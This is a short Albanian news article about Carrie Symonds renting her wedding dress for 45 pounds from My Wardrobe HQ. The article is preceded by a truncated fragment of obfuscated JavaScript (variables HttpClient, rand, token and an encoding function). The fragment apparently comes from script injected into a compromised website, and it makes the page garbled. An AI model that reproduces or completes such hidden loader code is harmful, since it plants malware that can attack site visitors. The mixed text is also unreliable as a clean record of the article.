;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Gruaja e kryeministrit britanik e mori me qira vellon e martesës për vetëm 45 funte

By

Gruaja e kryeministrit britanik nuk kishte vello të dizajnuar veçanërisht për ditën e saj më të rëndësishme, meqë fustanin e nusërisë e kishte marrë me qira.

Carrie Symonds kishte marrë vellon me qira për disa ditë nga një faqe në internet e quajtur “My Wardrobe HQ”, njofton Klan Kosova.

“Carrie gjithmonë ka marrë me qira nga ne”, thotë Sacha Newall, themeluesja e “My Wardrobe HQ”, e cila nuk kishte ide se kjo veshje e veçantë ishte e destinuar për Katedralen e Westminsterit.

Fustani i dizajnerit grek Christos Costarellos do të kushtonte 2,870 funte, por Symonds e mori me qira atë për 45 funte.

Marrja me qira e rrobave nga veshjet, këpucët, çantat dhe aksesorët e flokëve është bërë gjithnjë e më popullarizuar gjatë viteve të fundit.

Edhe pandemia nuk është se i ka dëmtuar shumë këto lloj biznese.

 

 

Artikuj të ngjashëm